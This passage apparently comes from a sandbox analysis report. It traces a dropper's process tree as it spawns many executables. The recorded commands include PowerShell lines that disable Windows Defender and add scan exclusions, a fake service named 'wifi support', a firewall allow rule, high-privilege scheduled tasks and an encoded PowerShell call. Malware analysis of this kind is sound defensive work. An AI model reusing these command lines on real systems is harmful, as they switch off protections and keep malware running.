PID 3336 wrote to memory of 792	3336	cmd.exe	Wed01f7e5b93d9.exe
PID 3172 wrote to memory of 380	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 380	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 380	3172	setup_install.exe	cmd.exe
PID 3660 wrote to memory of 2176	3660	cmd.exe	Wed011abd65cf6e.exe
PID 3660 wrote to memory of 2176	3660	cmd.exe	Wed011abd65cf6e.exe
PID 3660 wrote to memory of 2176	3660	cmd.exe	Wed011abd65cf6e.exe
PID 3172 wrote to memory of 4420	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 4420	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 4420	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 4616	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 4616	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 4616	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 1640	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 1640	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 1640	3172	setup_install.exe	cmd.exe
PID 380 wrote to memory of 2584	380	cmd.exe	Wed010bd23656.exe
PID 380 wrote to memory of 2584	380	cmd.exe	Wed010bd23656.exe
PID 3172 wrote to memory of 740	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 740	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 740	3172	setup_install.exe	cmd.exe
PID 3352 wrote to memory of 3948	3352	cmd.exe	Wed01a11f81d09577.exe
PID 3352 wrote to memory of 3948	3352	cmd.exe	Wed01a11f81d09577.exe
PID 3352 wrote to memory of 3948	3352	cmd.exe	Wed01a11f81d09577.exe
PID 3172 wrote to memory of 2484	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 2484	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 2484	3172	setup_install.exe	cmd.exe
PID 1640 wrote to memory of 2216	1640	cmd.exe	WerFault.exe
PID 1640 wrote to memory of 2216	1640	cmd.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exe
"C:\Users\Admin\AppData\Local\Temp\F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4852

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4296

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:3876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed01a11f81d09577.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3352

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01a11f81d09577.exe
Wed01a11f81d09577.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3948

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01a11f81d09577.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01a11f81d09577.exe
6⤵
- Executes dropped EXE
PID:1248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed010bd23656.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:380

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed010bd23656.exe
Wed010bd23656.exe
5⤵
- Executes dropped EXE
PID:2584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed01cb8783ed376.exe /mixone
4⤵
PID:4616

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01cb8783ed376.exe
Wed01cb8783ed376.exe /mixone
5⤵
- Executes dropped EXE
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 632
6⤵
- Program crash
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 672
6⤵
- Program crash
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 752
6⤵
- Program crash
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 784
6⤵
- Program crash
PID:628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 836
6⤵
- Program crash
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 696
6⤵
- Program crash
PID:2668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1060
6⤵
- Program crash
PID:2400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1068
6⤵
- Program crash
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1300
6⤵
- Program crash
PID:860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed011301c1f8269d.exe
4⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed011301c1f8269d.exe
Wed011301c1f8269d.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4200

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed011301c1f8269d.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed011301c1f8269d.exe
6⤵
- Executes dropped EXE
PID:1456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed01f0f622732865b.exe
4⤵
PID:1440

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01f0f622732865b.exe
Wed01f0f622732865b.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed016c01e4e1de9.exe
4⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed012ad6331600ed.exe
4⤵
PID:2484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0127b0d6b4cf.exe
4⤵
PID:740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed01649fe394044e.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed016bd188413.exe
4⤵
PID:4420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed010dc6015ee.exe
4⤵
PID:3840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed01d85f2899987.exe
4⤵
PID:2520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed011abd65cf6e.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed01f7e5b93d9.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3336

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed0127b0d6b4cf.exe
Wed0127b0d6b4cf.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:4724

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Users\Admin\AppData\Local\Temp\is-P72PM.tmp\Wed010dc6015ee.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P72PM.tmp\Wed010dc6015ee.tmp" /SL5="$7011C,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed010dc6015ee.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1320

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed016bd188413.exe
Wed016bd188413.exe
1⤵
- Executes dropped EXE
PID:4204

C:\Users\Admin\AppData\Local\Temp\is-DHRMS.tmp\Wed016bd188413.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DHRMS.tmp\Wed016bd188413.tmp" /SL5="$201E4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed016bd188413.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:4516

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed016bd188413.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed016bd188413.exe" /SILENT
3⤵
- Executes dropped EXE
PID:2684

C:\Users\Admin\AppData\Local\Temp\is-H9DGC.tmp\Wed016bd188413.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H9DGC.tmp\Wed016bd188413.tmp" /SL5="$2021C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed016bd188413.exe" /SILENT
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2236

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed012ad6331600ed.exe
Wed012ad6331600ed.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:5056

C:\Users\Admin\Pictures\Adobe Films\fIjUfuIsUYKaFY4t1nXt4GIH.exe
"C:\Users\Admin\Pictures\Adobe Films\fIjUfuIsUYKaFY4t1nXt4GIH.exe"
2⤵
PID:4144

C:\Users\Admin\AppData\Local\Temp\is-4THFT.tmp\is-C28KD.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4THFT.tmp\is-C28KD.tmp" /SL4 $40276 "C:\Users\Admin\Pictures\Adobe Films\fIjUfuIsUYKaFY4t1nXt4GIH.exe" 2106088 52736
3⤵
PID:5436

C:\Users\Admin\Pictures\Adobe Films\OLyGj2GpvmUxGIdzA19npyO1.exe
"C:\Users\Admin\Pictures\Adobe Films\OLyGj2GpvmUxGIdzA19npyO1.exe"
2⤵
PID:4472

C:\Users\Admin\Pictures\Adobe Films\RweC4wiZqLYi09A082F8Xikt.exe
"C:\Users\Admin\Pictures\Adobe Films\RweC4wiZqLYi09A082F8Xikt.exe"
2⤵
PID:5144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:4464

C:\Users\Admin\Pictures\Adobe Films\UeuSAOTOeaIuEDHUzcrAG5iF.exe
"C:\Users\Admin\Pictures\Adobe Films\UeuSAOTOeaIuEDHUzcrAG5iF.exe"
2⤵
PID:5136

C:\Users\Admin\Pictures\Adobe Films\Rl8hrWaRoCwjFLxmt1Nekydk.exe
"C:\Users\Admin\Pictures\Adobe Films\Rl8hrWaRoCwjFLxmt1Nekydk.exe"
2⤵
PID:5128

C:\Windows\SysWOW64\choice.exe
choice 3489834785637788484436574374756367847583
3⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Breaks.mil & ping -n 5 localhost
3⤵
PID:3948

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:6712

C:\Users\Admin\Pictures\Adobe Films\mfd8zzcthqkgtnXt7fSXGVRn.exe
"C:\Users\Admin\Pictures\Adobe Films\mfd8zzcthqkgtnXt7fSXGVRn.exe"
2⤵
PID:4880

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
3⤵
PID:6000

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
3⤵
PID:6012

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
PID:7848

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
3⤵
PID:5572

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
4⤵
PID:9740

C:\Users\Admin\Pictures\Adobe Films\jcwe_ojsL_Cyl6l26gSUddle.exe
"C:\Users\Admin\Pictures\Adobe Films\jcwe_ojsL_Cyl6l26gSUddle.exe"
2⤵
PID:652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 1224
3⤵
- Program crash
PID:12740

C:\Users\Admin\Pictures\Adobe Films\QqezhRgufYT3LgoIun_YSJTa.exe
"C:\Users\Admin\Pictures\Adobe Films\QqezhRgufYT3LgoIun_YSJTa.exe"
2⤵
PID:3464

C:\Users\Admin\Pictures\Adobe Films\SZDfWB3F2Ksxn91_DsO_4j1W.exe
"C:\Users\Admin\Pictures\Adobe Films\SZDfWB3F2Ksxn91_DsO_4j1W.exe"
2⤵
PID:4952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:2868

C:\Users\Admin\Pictures\Adobe Films\P_lscMHoGsNBa5J6BT4E56D5.exe
"C:\Users\Admin\Pictures\Adobe Films\P_lscMHoGsNBa5J6BT4E56D5.exe"
2⤵
PID:4136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:2120

C:\Users\Admin\Pictures\Adobe Films\GfLDOZkhElGvgVVjmIsy5R_b.exe
"C:\Users\Admin\Pictures\Adobe Films\GfLDOZkhElGvgVVjmIsy5R_b.exe"
2⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\luczlhnc\
3⤵
PID:5964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzbofxi.exe" C:\Windows\SysWOW64\luczlhnc\
3⤵
PID:5412

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create luczlhnc binPath= "C:\Windows\SysWOW64\luczlhnc\jzbofxi.exe /d\"C:\Users\Admin\Pictures\Adobe Films\GfLDOZkhElGvgVVjmIsy5R_b.exe\"" type= own start= auto DisplayName= "wifi support"
3⤵
- Launches sc.exe
PID:6420

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description luczlhnc "wifi internet conection"
3⤵
- Launches sc.exe
PID:6804

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start luczlhnc
3⤵
- Launches sc.exe
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 668
3⤵
- Program crash
PID:6984

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
- Modifies Windows Firewall
PID:6424

C:\Users\Admin\Pictures\Adobe Films\BS2lnDgJww_esO2EpL9ObZUq.exe
"C:\Users\Admin\Pictures\Adobe Films\BS2lnDgJww_esO2EpL9ObZUq.exe"
2⤵
PID:2752

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" -Y .\4h8Y.XKh
3⤵
PID:5844

C:\Users\Admin\Pictures\Adobe Films\3hgEgCkl4MnhYWvSpRlb0aCF.exe
"C:\Users\Admin\Pictures\Adobe Films\3hgEgCkl4MnhYWvSpRlb0aCF.exe"
2⤵
PID:2176

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:7448

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:7440

C:\Users\Admin\Documents\Mqk3tjfTfoorfuamTcwGJkCf.exe
"C:\Users\Admin\Documents\Mqk3tjfTfoorfuamTcwGJkCf.exe"
3⤵
PID:7432

C:\Users\Admin\Pictures\Adobe Films\VmoDXFzu9xcqkeSH4OJNMU7j.exe
"C:\Users\Admin\Pictures\Adobe Films\VmoDXFzu9xcqkeSH4OJNMU7j.exe"
4⤵
PID:33760

C:\Users\Admin\Pictures\Adobe Films\6HQ4SSP2Vk8UtXk3iIoGJB02.exe
"C:\Users\Admin\Pictures\Adobe Films\6HQ4SSP2Vk8UtXk3iIoGJB02.exe"
4⤵
PID:33768

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\SETUP_~1.EXE
5⤵
PID:35020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA2AA==
6⤵
PID:36964

C:\Users\Admin\Pictures\Adobe Films\8jDS4dgRHYYpL20dz6aSYola.exe
"C:\Users\Admin\Pictures\Adobe Films\8jDS4dgRHYYpL20dz6aSYola.exe"
4⤵
PID:33752

C:\Windows\SysWOW64\at.exe
at 3874982763784yhwgdfg78234789s42809374918uf
5⤵
PID:34148

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Florist.hopp & ping -n 5 localhost
5⤵
PID:35644

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:36712

C:\Users\Admin\Pictures\Adobe Films\4qxM4uTKtVxkYZc_6oIdQnrH.exe
"C:\Users\Admin\Pictures\Adobe Films\4qxM4uTKtVxkYZc_6oIdQnrH.exe"
4⤵
PID:33744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:4404

C:\Users\Admin\Pictures\Adobe Films\CgfqwZEoJ5h1knIUHVcPDDNT.exe
"C:\Users\Admin\Pictures\Adobe Films\CgfqwZEoJ5h1knIUHVcPDDNT.exe"
4⤵
PID:33796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 33796 -s 340
5⤵
- Program crash
PID:35192

C:\Users\Admin\Pictures\Adobe Films\8EdtVGuqmqGYfTk1ExjB1PEo.exe
"C:\Users\Admin\Pictures\Adobe Films\8EdtVGuqmqGYfTk1ExjB1PEo.exe"
4⤵
PID:33784

C:\Windows\SysWOW64\choice.exe
choice 3489834785637788484436574374756367847583
5⤵
PID:34304

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Breaks.mil & ping -n 5 localhost
5⤵
PID:35392

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:36552

C:\Users\Admin\Pictures\Adobe Films\ReDjBS6F_WSL1YkS2B_W2XMP.exe
"C:\Users\Admin\Pictures\Adobe Films\ReDjBS6F_WSL1YkS2B_W2XMP.exe"
4⤵
PID:33776

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /Y .\TW0KDS.y
5⤵
PID:34680

C:\Users\Admin\Pictures\Adobe Films\haXxyKI38c07x9YLU9Svjiyr.exe
"C:\Users\Admin\Pictures\Adobe Films\haXxyKI38c07x9YLU9Svjiyr.exe"
4⤵
PID:33932

C:\Users\Admin\AppData\Local\Temp\is-RPNIR.tmp\haXxyKI38c07x9YLU9Svjiyr.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RPNIR.tmp\haXxyKI38c07x9YLU9Svjiyr.tmp" /SL5="$60324,254182,170496,C:\Users\Admin\Pictures\Adobe Films\haXxyKI38c07x9YLU9Svjiyr.exe"
5⤵
PID:34208

C:\Users\Admin\AppData\Local\Temp\is-56T5C.tmp\PowerOff.exe
"C:\Users\Admin\AppData\Local\Temp\is-56T5C.tmp\PowerOff.exe" /S /UID=95
6⤵
PID:35064

C:\Users\Admin\AppData\Local\Temp\29-5b879-ec0-11ca8-6ec2081c1b52c\Gipazhaezhoki.exe
"C:\Users\Admin\AppData\Local\Temp\29-5b879-ec0-11ca8-6ec2081c1b52c\Gipazhaezhoki.exe"
7⤵
PID:36868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bpdui3zi.yxb\GcleanerEU.exe /eufive & exit
8⤵
PID:39884

C:\Users\Admin\AppData\Local\Temp\bpdui3zi.yxb\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\bpdui3zi.yxb\GcleanerEU.exe /eufive
9⤵
PID:35512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 35512 -s 448
10⤵
- Program crash
PID:41792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 35512 -s 768
10⤵
- Program crash
PID:42972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 35512 -s 776
10⤵
- Program crash
PID:43312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 35512 -s 816
10⤵
- Program crash
PID:41232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 35512 -s 824
10⤵
- Program crash
PID:44348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rcix4nzy.ufr\gcleaner.exe /mixfive & exit
8⤵
PID:39192

C:\Users\Admin\AppData\Local\Temp\rcix4nzy.ufr\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\rcix4nzy.ufr\gcleaner.exe /mixfive
9⤵
PID:8940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8940 -s 452
10⤵
- Program crash
PID:42004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8940 -s 768
10⤵
- Program crash
PID:3400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8940 -s 808
10⤵
- Program crash
PID:43724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8940 -s 820
10⤵
- Program crash
PID:7908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8940 -s 784
10⤵
- Program crash
PID:44760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3fpbjdx5.4tj\random.exe & exit
8⤵
PID:40164

C:\Users\Admin\AppData\Local\Temp\3fpbjdx5.4tj\random.exe
C:\Users\Admin\AppData\Local\Temp\3fpbjdx5.4tj\random.exe
9⤵
PID:41480

C:\Users\Admin\AppData\Local\Temp\3fpbjdx5.4tj\random.exe
"C:\Users\Admin\AppData\Local\Temp\3fpbjdx5.4tj\random.exe" -q
10⤵
PID:42544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtaajz2f.fcl\pb1117.exe & exit
8⤵
PID:40736

C:\Users\Admin\AppData\Local\Temp\xtaajz2f.fcl\pb1117.exe
C:\Users\Admin\AppData\Local\Temp\xtaajz2f.fcl\pb1117.exe
9⤵
PID:41000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20hqpsmm.5bw\toolspab3.exe & exit
8⤵
PID:34484

C:\Users\Admin\AppData\Local\Temp\20hqpsmm.5bw\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\20hqpsmm.5bw\toolspab3.exe
9⤵
PID:42660

C:\Users\Admin\AppData\Local\Temp\20hqpsmm.5bw\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\20hqpsmm.5bw\toolspab3.exe
10⤵
PID:43296

C:\Users\Admin\AppData\Local\Temp\a6-6ee23-265-ad689-abb6bf083af95\Lykidiseby.exe
"C:\Users\Admin\AppData\Local\Temp\a6-6ee23-265-ad689-abb6bf083af95\Lykidiseby.exe"
7⤵
PID:36004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
8⤵
PID:39552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6ee646f8,0x7ffa6ee64708,0x7ffa6ee64718
9⤵
PID:39616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
9⤵
PID:39400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
9⤵
PID:39352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
9⤵
PID:1844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
9⤵
PID:39440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
9⤵
PID:40160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
